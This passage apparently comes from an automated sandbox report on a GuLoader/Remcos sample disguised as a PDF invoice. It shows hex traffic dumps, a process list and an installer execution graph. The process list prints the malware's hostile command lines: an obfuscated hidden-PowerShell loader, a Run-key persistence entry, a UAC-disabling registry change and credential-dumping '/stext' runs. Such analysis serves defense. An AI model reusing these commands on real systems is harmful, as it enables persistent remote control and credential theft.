                        2024-07-02 05:39:38 UTC1390INData Raw: c0 d1 8a 4a 98 e1 d5 18 e1 81 18 89 98 77 50 d1 1f 27 24 27 d3 f6 09 e9 12 36 53 cc cf 2f 72 97 38 92 21 d8 da 60 cd 66 d9 c9 75 e9 39 3d 33 8c c0 76 3d 65 58 6a 82 df 9d df 5f 68 4d c4 04 a2 dd 71 b9 30 66 ad f4 a0 fe 8e ce 38 a2 d2 8c 81 b8 54 ad c2 84 4d b7 54 2e 64 08 8c 43 3a bc 90 92 ce 4e d5 52 f5 9a 63 9e 47 3f dc de 97 66 6b 84 18 2c 44 fe ab 33 a0 9d f3 fd 13 23 65 7e 59 45 0e 03 24 32 5f 9b 94 90 24 40 f7 d2 de 65 dd 0d a6 bc 6b 4b 1d 10 94 2e 43 3b b2 c8 01 cc a1 64 aa 0d 9c 26 e3 00 3e ec b9 d8 6d 4c da a5 8c 86 cf 9a 7d 21 97 01 cd f6 45 2b 75 9d e8 75 4c 37 ee 48 0f fa 94 2e 79 2c f6 d1 fd 52 f8 cc 17 65 c9 88 3f 89 96 07 eb 09 57 0f bc 4d 70 aa 80 c6 15 3d 3c 01 1f ea 97 47 70 8c 13 02 78 ea 08 31 eb 2c b2 27 76 b4 2c cc 1b 48 e6 64 93 40
                        Data Ascii: JwP'$'6S/r8!`fu9=3v=eXj_hMq0f8TMT.dC:NRcG?fk,D3#e~YE$2_$@ekK.C;d&>mL}!E+uuL7H.y,Re?WMp=<Gpx1,'v,Hd@
                        2024-07-02 05:39:38 UTC1390INData Raw: 84 f5 5f 65 c5 00 59 e3 7e 98 e0 4f 7b db b7 7a 42 ea 7d 62 3c 59 b6 5a e0 3c 21 98 ab 25 8e ef d5 9d cb 4a 7c 96 77 d7 3e 90 be ac 47 d3 85 70 ed f4 2d c3 b4 a3 9b 45 a2 09 6b 3a b3 30 b8 15 d5 87 12 e8 b4 08 eb 09 7d 53 92 27 1e 58 ed 0c ef 0d d3 f1 7d 9d 30 1a 99 42 24 13 58 01 f9 04 0a c7 e7 c5 c9 c5 cd 8c 47 bd b5 e6 75 9d 07 10 eb 1a 01 85 f1 6a 30 b7 bd 1c e1 01 e5 b3 a0 ea 39 ca d2 9a 6b 58 cf 41 8b 60 45 98 a7 f2 b9 bb 2d 96 5b 58 34 d0 30 18 7f 6f ba 7a 2e 18 c1 03 eb 06 e9 07 24 89 01 98 6a db 00 2e c8 51 97 67 ae 7d 18 2e 56 ae 7f 42 a7 b9 50 d2 13 16 20 e8 8d 9b 2b 89 4a 78 3a cc 42 95 bf 32 49 30 50 09 ae 1c 6f fc c1 0d dc 25 8c c2 5b af f6 46 ac 76 2c 93 7a aa 37 12 aa 7c fe da d0 a3 c9 68 65 de 67 27 9f a0 b1 54 f2 f7 b4 02 a0 64 c8 7f 31
                        Data Ascii: _eY~O{zB}b<YZ<!%J|w>Gp-Ek:0}S'X}0B$XGuj09kXA`E-[X40oz.$j.Qg}.VBP +Jx:B2I0Po%[Fv,z7|heg'Td1
                        2024-07-02 05:39:38 UTC1390INData Raw: 4b 46 f4 1f 92 af 2e 3f 88 c2 61 c0 df 60 97 2e 75 c9 0f 20 36 76 19 50 1b c2 cc ef c9 ed 5a a1 4b 82 02 33 76 4d 9f 14 3c 80 06 ec 77 1f 31 31 d3 38 9a aa f9 09 4a 6a b8 82 60 a6 39 7d ae c5 3a 54 3f fd 7b 37 6d 9a b3 82 1c a6 3d 4d cf 9c 9c ec 58 9f c2 b2 a3 37 6c 19 91 f8 13 16 79 e3 44 0a b6 f1 f2 ae ff e9 0f 25 44 5a b9 38 7b f3 f7 d9 64 95 1b cc df f6 05 26 c4 17 e2 29 be 28 ef 6e cd 51 5d 6c fc 44 38 25 6d 8b cb 22 b3 d3 14 ac fb 08 69 78 e7 75 55 9e 52 5e cc 7c 62 23 26 5d 0c ef 5d c8 6e 69 f4 a0 c6 87 26 75 40 4b 91 b7 75 16 68 26 e2 18 48 56 aa f7 26 e2 5c d3 d0 1d e3 ee 12 e8 84 19 4d 7b 71 a8 c5 24 aa b6 e3 ee 1b 4b 63 80 58 cb 9c b4 4c 14 5f 9d 3e f2 03 45 d2 3f 20 e4 1d 73 c2 66 7b f4 46 16 be 78 76 91 bb 86 26 42 b2 86 5b 92 3d cf b9 07 33
                        Data Ascii: KF.?a`.u 6vPZK3vM<w118Jj`9}:T?{7m=MX7lyD%DZ8{d&)(nQ]lD8%m"ixuUR^|b#&]]ni&u@Kuh&HV&\M{q$KcXL_>E? sf{Fxv&B[=3
                        2024-07-02 05:39:38 UTC1390INData Raw: 6d c9 50 3c 5a 68 04 93 32 ac cd 02 f1 72 f8 af f2 81 0b b1 0b fe 3f f0 c4 06 5f a9 35 6f 6a a5 2b 1b fd 08 bd 5e 18 d2 cc ae 96 f0 6c 6b 69 08 f8 57 52 ad 5e e1 c5 6c dc ba 3b d8 5e bd 1c 7e 3b ba fc 90 05 73 c2 e0 08 24 ed 9d 7d 8c b4 a2 e8 0e e7 17 9e b4 36 ac 75 fd f2 55 7a e2 94 46 60 7a be 76 cc e0 34 95 3d e8 47 b2 2b a3 be a4 cd 75 3e 65 77 26 c8 30 f4 42 8e 12 ab 70 bc c6 e8 6d fd a3 17 e4 3c e4 14 78 f5 d0 70 f6 60 db 9c fc c6 b4 82 6c 3c ef a6 2b 88 96 d2 38 88 cc 69 6c 83 55 56 0f 0e 4e 61 60 03 1b b2 76 f8 5e 71 c6 50 ac 62 42 07 d7 70 78 4b ef 77 82 55 32 02 37 0f ba 96 f5 b7 49 2c 67 f9 a2 30 70 b1 cb 90 0e 7f ab 4a 13 2e 22 5a 2e 4a f8 c5 7d b2 bf c3 6f 66 c9 47 b3 27 aa 8f 67 19 41 79 85 31 b7 ae 3e 42 f5 97 20 55 ce 7b 28 bb 5c 56 52 1a
                        Data Ascii: mP<Zh2r?_5oj+^lkiWR^l;^~;s$}6uUzF`zv4=G+u>ew&0Bpm<xp`l<+8ilUVNa`v^qPbBpxKwU27I,g0pJ."Z.J}ofG'gAy1>B U{(\VR
                        2024-07-02 05:39:38 UTC1390INData Raw: 3e c8 e4 db 3a a2 8d 95 11 60 2d 27 af bb ea 13 7f 4d cd 89 f1 67 67 3e 17 d4 82 a1 6f d0 65 69 a9 28 1c 01 7a d0 4d 3a ad e8 aa 1a b3 14 65 a4 29 41 68 ed 64 00 3a 7c d3 f6 a9 2e 05 fc 2f aa ac 12 5e 51 8f d5 04 a2 d2 82 41 9b e4 a2 1c a2 57 56 f9 39 30 66 b5 e7 66 25 d9 54 cd 00 4b 52 a0 ab 63 9e 88 ae 8d 96 36 df 33 10 c3 c3 2f 6e a7 b8 6e 45 d3 fd cc 08 65 0a 45 ea e4 e8 dc d4 6d 67 d7 07 93 6c 5a 7b 76 bb cf 54 9b ab 21 85 a6 cb e7 4d 43 a9 a5 f1 bc b8 12 43 7d d6 84 50 7b 2e 3e 90 7e 24 6d 49 73 39 f2 4d d8 d5 ce 55 a3 ea 25 7d 8b 28 4f b9 24 c1 23 03 f9 56 28 06 a8 21 cf dd ed 75 c1 87 c3 b4 b8 a7 bd 0d f3 02 bc 74 f0 af f8 f3 8c 4d 44 70 c5 0b 3e 64 d4 7f fb 4b aa 4c b7 66 bb ac 6f 41 86 99 9f d3 52 3b 76 8b 84 50 20 b9 f1 e2 f3 71 79 f7 56 8c 42
                        Data Ascii: >:`-'Mgg>oei(zM:e)Ahd:|./^QAWV90ff%TKRc63/nnEeEmglZ{vT!MCC}P{.>~$mIs9MU%}(O$#V(!utMDp>dKLfoAR;vP qyVB


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:01:38:54
                        Start date:02/07/2024
                        Path:C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe"
                        Imagebase:0x400000
                        File size:914'080 bytes
                        MD5 hash:3FB7CB8D7FD9EFD2BC0CAE35EB42C4FE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:2
                        Start time:01:38:55
                        Start date:02/07/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28';$Thiohydrate=$Repowered144.SubString(6682,3);.$Thiohydrate($Repowered144)"
                        Imagebase:0x5f0000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1663936772.0000000008EC4000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:01:38:55
                        Start date:02/07/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:16
                        Start time:03:09:11
                        Start date:02/07/2024
                        Path:C:\Users\user\AppData\Local\Temp\Nubilum.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user~1\AppData\Local\Temp\Nubilum.exe"
                        Imagebase:0x400000
                        File size:914'080 bytes
                        MD5 hash:3FB7CB8D7FD9EFD2BC0CAE35EB42C4FE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.3682803915.000000000280F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000010.00000002.3672277359.0000000001BE4000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        Antivirus matches:
                        • Detection: 21%, ReversingLabs
                        • Detection: 14%, Virustotal, Browse
                        Reputation:low
                        Has exited:false

                        Target ID:17
                        Start time:03:09:23
                        Start date:02/07/2024
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)"
                        Imagebase:0x410000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:18
                        Start time:03:09:23
                        Start date:02/07/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:19
                        Start time:03:09:23
                        Start date:02/07/2024
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)"
                        Imagebase:0x9a0000
                        File size:59'392 bytes
                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:20
                        Start time:03:09:27
                        Start date:02/07/2024
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                        Imagebase:0x410000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:21
                        Start time:03:09:27
                        Start date:02/07/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:22
                        Start time:03:09:27
                        Start date:02/07/2024
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                        Imagebase:0x9a0000
                        File size:59'392 bytes
                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:24
                        Start time:03:09:28
                        Start date:02/07/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Imagebase:0x7ff7b4ee0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:28
                        Start time:03:09:31
                        Start date:02/07/2024
                        Path:C:\Users\user\AppData\Local\Temp\Nubilum.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\avtrjqntogc"
                        Imagebase:0x400000
                        File size:914'080 bytes
                        MD5 hash:3FB7CB8D7FD9EFD2BC0CAE35EB42C4FE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:29
                        Start time:03:09:31
                        Start date:02/07/2024
                        Path:C:\Users\user\AppData\Local\Temp\Nubilum.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\cpykjjxvcoutma"
                        Imagebase:0x400000
                        File size:914'080 bytes
                        MD5 hash:3FB7CB8D7FD9EFD2BC0CAE35EB42C4FE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:30
                        Start time:03:09:31
                        Start date:02/07/2024
                        Path:C:\Users\user\AppData\Local\Temp\Nubilum.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\nrdukbioqxmyohrux"
                        Imagebase:0x400000
                        File size:914'080 bytes
                        MD5 hash:3FB7CB8D7FD9EFD2BC0CAE35EB42C4FE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:40.1%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:23.7%
                          Total number of Nodes:482
                          Total number of Limit Nodes:11
                          execution_graph 1239 403311 SetErrorMode GetVersion 1240 403346 1239->1240 1241 40334c 1239->1241 1242 40649b 5 API calls 1240->1242 1327 40642b GetSystemDirectoryW 1241->1327 1242->1241 1244 403362 lstrlenA 1244->1241 1245 403372 1244->1245 1330 40649b GetModuleHandleA 1245->1330 1248 40649b 5 API calls 1249 403381 #17 OleInitialize SHGetFileInfoW 1248->1249 1336 4060c1 lstrcpynW 1249->1336 1251 4033be GetCommandLineW 1337 4060c1 lstrcpynW 1251->1337 1253 4033d0 GetModuleHandleW 1254 4033e8 1253->1254 1338 405aa2 1254->1338 1257 403521 GetTempPathW 1342 4032e0 1257->1342 1259 403539 1260 403593 DeleteFileW 1259->1260 1261 40353d GetWindowsDirectoryW lstrcatW 1259->1261 1352 402e82 GetTickCount GetModuleFileNameW 1260->1352 1262 4032e0 12 API calls 1261->1262 1265 403559 1262->1265 1263 405aa2 CharNextW 1267 403410 1263->1267 1265->1260 1268 40355d GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 1265->1268 1266 4035a7 1269 40365a 1266->1269 1274 40364a 1266->1274 1278 405aa2 CharNextW 1266->1278 1267->1263 1271 40350c 1267->1271 1273 40350a 1267->1273 1272 4032e0 12 API calls 1268->1272 1487 403830 1269->1487 1470 4060c1 lstrcpynW 1271->1470 1276 40358b 1272->1276 1273->1257 1380 40390a 1274->1380 1276->1260 1276->1269 1291 4035c6 1278->1291 1280 403794 1283 403818 ExitProcess 1280->1283 1284 40379c GetCurrentProcess OpenProcessToken 1280->1284 1281 403674 1494 405806 1281->1494 1289 4037b4 LookupPrivilegeValueW AdjustTokenPrivileges 1284->1289 1290 4037e8 1284->1290 1287 403624 1471 405b7d 1287->1471 1288 40368a 1436 405789 1288->1436 1289->1290 1294 40649b 5 API calls 1290->1294 1291->1287 1291->1288 1297 4037ef 1294->1297 1300 403804 ExitWindowsEx 1297->1300 1301 403811 1297->1301 1298 4036a0 lstrcatW 1299 4036ab lstrcatW lstrcmpiW 1298->1299 1299->1269 1303 4036c7 1299->1303 1300->1283 1300->1301 1502 40140b 1301->1502 1306 4036d3 1303->1306 1307 4036cc 1303->1307 1305 40363f 1486 4060c1 lstrcpynW 1305->1486 1498 40576c CreateDirectoryW 1306->1498 1439 4056ef CreateDirectoryW 1307->1439 1311 4036d8 SetCurrentDirectoryW 1313 4036f3 1311->1313 1314 4036e8 1311->1314 1444 4060c1 lstrcpynW 1313->1444 1501 4060c1 lstrcpynW 1314->1501 1319 40373f CopyFileW 1324 403701 1319->1324 1320 403788 1321 405f62 38 API calls 1320->1321 1321->1269 1323 4060e3 18 API calls 1323->1324 1324->1320 1324->1323 1326 403773 CloseHandle 1324->1326 1445 4060e3 1324->1445 1463 405f62 MoveFileExW 1324->1463 1467 4057a1 CreateProcessW 1324->1467 1326->1324 1328 40644d wsprintfW LoadLibraryExW 1327->1328 1328->1244 1331 4064c1 GetProcAddress 1330->1331 1332 4064b7 1330->1332 1334 40337a 1331->1334 1333 40642b 3 API calls 1332->1333 1335 4064bd 1333->1335 1334->1248 1335->1331 1335->1334 1336->1251 1337->1253 1339 405aa8 1338->1339 1340 4033f7 CharNextW 1339->1340 1341 405aaf CharNextW 1339->1341 1340->1257 1340->1267 1341->1339 1505 406355 1342->1505 1344 4032ec 1345 4032f6 1344->1345 1514 405a75 lstrlenW CharPrevW 1344->1514 1345->1259 1348 40576c 2 API calls 1349 403304 1348->1349 1517 405cc5 1349->1517 1521 405c96 GetFileAttributesW CreateFileW 1352->1521 1354 402ec2 1375 402ed2 1354->1375 1522 4060c1 lstrcpynW 1354->1522 1356 402ee8 1523 405ac1 lstrlenW 1356->1523 1360 402ef9 GetFileSize 1361 402ff5 1360->1361 1373 402f10 1360->1373 1528 402e1e 1361->1528 1363 402ffe 1365 40302e GlobalAlloc 1363->1365 1363->1375 1563 4032c9 SetFilePointer 1363->1563 1539 4032c9 SetFilePointer 1365->1539 1367 403061 1371 402e1e 6 API calls 1367->1371 1369 403017 1372 4032b3 ReadFile 1369->1372 1370 403049 1540 4030bb 1370->1540 1371->1375 1376 403022 1372->1376 1373->1361 1373->1367 1373->1375 1377 402e1e 6 API calls 1373->1377 1560 4032b3 1373->1560 1375->1266 1376->1365 1376->1375 1377->1373 1378 403055 1378->1375 1378->1378 1379 403092 SetFilePointer 1378->1379 1379->1375 1381 40649b 5 API calls 1380->1381 1382 40391e 1381->1382 1383 403924 1382->1383 1384 403936 1382->1384 1593 406008 wsprintfW 1383->1593 1594 405f8e RegOpenKeyExW 1384->1594 1388 403985 lstrcatW 1389 403934 1388->1389 1584 403be0 1389->1584 1390 405f8e 3 API calls 1390->1388 1393 405b7d 18 API calls 1394 4039b7 1393->1394 1395 403a4b 1394->1395 1397 405f8e 3 API calls 1394->1397 1396 405b7d 18 API calls 1395->1396 1398 403a51 1396->1398 1399 4039e9 1397->1399 1400 403a61 LoadImageW 1398->1400 1401 4060e3 18 API calls 1398->1401 1399->1395 1404 403a0a lstrlenW 1399->1404 1407 405aa2 CharNextW 1399->1407 1402 403b07 1400->1402 1403 403a88 RegisterClassW 1400->1403 1401->1400 1406 40140b 2 API calls 1402->1406 1405 403abe SystemParametersInfoW CreateWindowExW 1403->1405 1435 403b11 1403->1435 1408 403a18 lstrcmpiW 1404->1408 1409 403a3e 1404->1409 1405->1402 1410 403b0d 1406->1410 1412 403a07 1407->1412 1408->1409 1413 403a28 GetFileAttributesW 1408->1413 1411 405a75 3 API calls 1409->1411 1414 403be0 19 API calls 1410->1414 1410->1435 1415 403a44 1411->1415 1412->1404 1416 403a34 1413->1416 1417 403b1e 1414->1417 1599 4060c1 lstrcpynW 1415->1599 1416->1409 1419 405ac1 2 API calls 1416->1419 1420 403b2a ShowWindow 1417->1420 1421 403bad 1417->1421 1419->1409 1422 40642b 3 API calls 1420->1422 1600 4052f3 OleInitialize 1421->1600 1425 403b42 1422->1425 1424 403bb3 1426 403bb7 1424->1426 1427 403bcf 1424->1427 1428 403b50 GetClassInfoW 1425->1428 1430 40642b 3 API calls 1425->1430 1433 40140b 2 API calls 1426->1433 1426->1435 1429 40140b 2 API calls 1427->1429 1431 403b64 GetClassInfoW RegisterClassW 1428->1431 1432 403b7a DialogBoxParamW 1428->1432 1429->1435 1430->1428 1431->1432 1434 40140b 2 API calls 1432->1434 1433->1435 1434->1435 1435->1269 1437 40649b 5 API calls 1436->1437 1438 40368f lstrcatW 1437->1438 1438->1298 1438->1299 1440 405740 GetLastError 1439->1440 1441 4036d1 1439->1441 1440->1441 1442 40574f SetFileSecurityW 1440->1442 1441->1311 1442->1441 1443 405765 GetLastError 1442->1443 1443->1441 1444->1324 1461 4060f0 1445->1461 1446 40633b 1447 403732 DeleteFileW 1446->1447 1617 4060c1 lstrcpynW 1446->1617 1447->1319 1447->1324 1449 4061a3 GetVersion 1449->1461 1450 406309 lstrlenW 1450->1461 1453 4060e3 10 API calls 1453->1450 1454 405f8e 3 API calls 1454->1461 1455 40621e GetSystemDirectoryW 1455->1461 1456 406231 GetWindowsDirectoryW 1456->1461 1457 406355 5 API calls 1457->1461 1458 406265 SHGetSpecialFolderLocation 1458->1461 1462 40627d SHGetPathFromIDListW CoTaskMemFree 1458->1462 1459 4060e3 10 API calls 1459->1461 1460 4062aa lstrcatW 1460->1461 1461->1446 1461->1449 1461->1450 1461->1453 1461->1454 1461->1455 1461->1456 1461->1457 1461->1458 1461->1459 1461->1460 1615 406008 wsprintfW 1461->1615 1616 4060c1 lstrcpynW 1461->1616 1462->1461 1464 405f83 1463->1464 1465 405f76 1463->1465 1464->1324 1618 405df0 lstrcpyW 1465->1618 1468 4057e0 1467->1468 1469 4057d4 CloseHandle 1467->1469 1468->1324 1469->1468 1470->1273 1652 4060c1 lstrcpynW 1471->1652 1473 405b8e 1653 405b20 CharNextW CharNextW 1473->1653 1476 403630 1476->1269 1485 4060c1 lstrcpynW 1476->1485 1477 406355 5 API calls 1480 405ba4 1477->1480 1478 405bd5 lstrlenW 1479 405be0 1478->1479 1478->1480 1481 405a75 3 API calls 1479->1481 1480->1476 1480->1478 1484 405ac1 2 API calls 1480->1484 1659 406404 FindFirstFileW 1480->1659 1483 405be5 GetFileAttributesW 1481->1483 1483->1476 1484->1478 1485->1305 1486->1274 1488 403848 1487->1488 1489 40383a CloseHandle 1487->1489 1662 403875 1488->1662 1489->1488 1496 40581b 1494->1496 1495 403682 ExitProcess 1496->1495 1497 40582f MessageBoxIndirectW 1496->1497 1497->1495 1499 405780 GetLastError 1498->1499 1500 40577c 1498->1500 1499->1500 1500->1311 1501->1313 1503 401389 2 API calls 1502->1503 1504 401420 1503->1504 1504->1283 1512 406362 1505->1512 1506 4063d8 1507 4063dd CharPrevW 1506->1507 1509 4063fe 1506->1509 1507->1506 1508 4063cb CharNextW 1508->1506 1508->1512 1509->1344 1510 405aa2 CharNextW 1510->1512 1511 4063b7 CharNextW 1511->1512 1512->1506 1512->1508 1512->1510 1512->1511 1513 4063c6 CharNextW 1512->1513 1513->1508 1515 405a91 lstrcatW 1514->1515 1516 4032fe 1514->1516 1515->1516 1516->1348 1518 405cd2 GetTickCount GetTempFileNameW 1517->1518 1519 40330f 1518->1519 1520 405d08 1518->1520 1519->1259 1520->1518 1520->1519 1521->1354 1522->1356 1524 405acf 1523->1524 1525 402eee 1524->1525 1526 405ad5 CharPrevW 1524->1526 1527 4060c1 lstrcpynW 1525->1527 1526->1524 1526->1525 1527->1360 1529 402e27 1528->1529 1530 402e3f 1528->1530 1531 402e30 DestroyWindow 1529->1531 1532 402e37 1529->1532 1533 402e47 1530->1533 1534 402e4f GetTickCount 1530->1534 1531->1532 1532->1363 1564 4064d7 1533->1564 1536 402e80 1534->1536 1537 402e5d CreateDialogParamW ShowWindow 1534->1537 1536->1363 1537->1536 1539->1370 1542 4030d4 1540->1542 1541 403102 1544 4032b3 ReadFile 1541->1544 1542->1541 1581 4032c9 SetFilePointer 1542->1581 1545 40310d 1544->1545 1546 40324c 1545->1546 1547 40311f GetTickCount 1545->1547 1549 403236 1545->1549 1548 40328e 1546->1548 1553 403250 1546->1553 1547->1549 1556 40314b 1547->1556 1550 4032b3 ReadFile 1548->1550 1549->1378 1550->1549 1551 4032b3 ReadFile 1551->1556 1552 4032b3 ReadFile 1552->1553 1553->1549 1553->1552 1554 405d48 WriteFile 1553->1554 1554->1553 1555 4031a1 GetTickCount 1555->1556 1556->1549 1556->1551 1556->1555 1557 4031c6 MulDiv wsprintfW 1556->1557 1579 405d48 WriteFile 1556->1579 1568 405220 1557->1568 1582 405d19 ReadFile 1560->1582 1563->1369 1565 4064f4 PeekMessageW 1564->1565 1566 402e4d 1565->1566 1567 4064ea DispatchMessageW 1565->1567 1566->1363 1567->1565 1569 4052dd 1568->1569 1571 40523b 1568->1571 1569->1556 1570 405257 lstrlenW 1573 405280 1570->1573 1574 405265 lstrlenW 1570->1574 1571->1570 1572 4060e3 18 API calls 1571->1572 1572->1570 1576 405293 1573->1576 1577 405286 SetWindowTextW 1573->1577 1574->1569 1575 405277 lstrcatW 1574->1575 1575->1573 1576->1569 1578 405299 SendMessageW SendMessageW SendMessageW 1576->1578 1577->1576 1578->1569 1580 405d66 1579->1580 1580->1556 1581->1541 1583 4032c6 1582->1583 1583->1373 1585 403bf4 1584->1585 1607 406008 wsprintfW 1585->1607 1587 403c65 1588 4060e3 18 API calls 1587->1588 1589 403c71 SetWindowTextW 1588->1589 1590 403995 1589->1590 1591 403c8d 1589->1591 1590->1393 1591->1590 1592 4060e3 18 API calls 1591->1592 1592->1591 1593->1389 1595 403966 1594->1595 1596 405fc2 RegQueryValueExW 1594->1596 1595->1388 1595->1390 1597 405fe3 RegCloseKey 1596->1597 1597->1595 1599->1395 1608 4041d1 1600->1608 1602 4041d1 SendMessageW 1603 40534f OleUninitialize 1602->1603 1603->1424 1605 40533d 1605->1602 1606 405316 1606->1605 1611 401389 1606->1611 1607->1587 1609 4041e9 1608->1609 1610 4041da SendMessageW 1608->1610 1609->1606 1610->1609 1613 401390 1611->1613 1612 4013fe 1612->1606 1613->1612 1614 4013cb MulDiv SendMessageW 1613->1614 1614->1613 1615->1461 1616->1461 1617->1447 1619 405e18 1618->1619 1620 405e3e GetShortPathNameW 1618->1620 1645 405c96 GetFileAttributesW CreateFileW 1619->1645 1622 405e53 1620->1622 1623 405f5d 1620->1623 1622->1623 1625 405e5b wsprintfA 1622->1625 1623->1464 1624 405e22 CloseHandle GetShortPathNameW 1624->1623 1627 405e36 1624->1627 1626 4060e3 18 API 